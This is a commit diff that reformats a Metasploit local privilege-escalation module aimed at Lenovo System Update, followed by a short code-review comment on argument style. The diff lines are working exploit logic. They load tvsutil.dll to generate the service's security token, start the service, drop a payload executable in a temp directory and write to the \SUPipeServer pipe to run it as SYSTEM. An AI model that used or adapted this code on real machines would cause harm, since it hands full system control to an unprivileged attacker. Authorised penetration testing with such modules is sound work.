Do minor code cleanup

unstable
jvazquez-r7 2015-05-22 16:20:36 -05:00
parent d99eedb1e4
commit 3aa1ffb4f5
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 26 additions and 26 deletions


@ -4,32 +4,31 @@
##
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Services
Rank = ExcellentRanking
def initialize(info={})
super(update_info(info, {
'Name' => 'Lenovo System Update Privilege Escalation',
'Description' => %q{
The named pipe, \SUPipeServer, can be accessed by normal users to interact
with the System update service. The service provides the possibility to execute
arbitrary commands as SYSTEM if a valid security token is provided. This token can
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
Please note that the System Update is stopped by default but can be started/stopped calling
the Executable ConfigService.exe
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
System update service. The service provides the possibility to execute arbitrary
commands as SYSTEM if a valid security token is provided. This token can be generated
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
System Update is stopped by default but can be started/stopped calling the Executable
ConfigService.exe.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Micahel Milvich', # vulnerability discovery, advisory
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
'Micahel Milvich', # vulnerability discovery, advisory
'Sofiane Talmat', # vulnerability discovery, advisory
'h0ng10' # Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
def get_security_token(lenovo_directory)
if not client.railgun.get_dll('tvsutil') then
unless client.railgun.get_dll('tvsutil')
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
end
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
return dll_response['systeminfo'][0,40]
dll_response['systeminfo'][0,40]
end
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
end
su_directory = service_info('SUService')[:path][1..-16]
print_status("Starting service via ConfigService.exe")
config_service(su_directory, "start")
print_status("Giving the service some time to start...")
sleep(datastore['sleep'])
print_status('Starting service via ConfigService.exe')
config_service(su_directory, 'start')
print_status('Giving the service some time to start...')
Rex.sleep(datastore['Sleep'])
print_status("Getting security token...")
token = get_security_token(su_directory)
vprint_good("Security token is: #{token}")
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
temp_dir = datastore['WritableDir']
else
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
temp_dir = get_env('TEMP')
else
temp_dir = datastore['WritableDir']
end
print_status("Using #{temp_dir} to drop malicious exe")
print_status("Using #{temp_dir} to drop the payload")
begin
cd(temp_dir)
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::Unknown, 'Failed to write to pipe')
end
print_status("Stopping service via ConfigService.exe")
config_service(su_directory, "stop")
print_status('Stopping service via ConfigService.exe')
config_service(su_directory, 'stop')
end
end
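Review bot: In `get_security_token` the re-quoted `add_function` call still passes `windows_name = nil, calling_conv = 'cdecl'`, which are local-variable assignments evaluated inside the argument list, not keyword arguments. The values reach the method positionally and two unused locals are left behind, so a reader can easily mistake them for named parameters. Since this commit already tidies that line, pass them plainly: `client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')`. Separately, the re-indented author entry `'Micahel Milvich'` in `initialize` is carried over unchanged; it looks like a misspelling of "Michael" and is worth checking against the advisory.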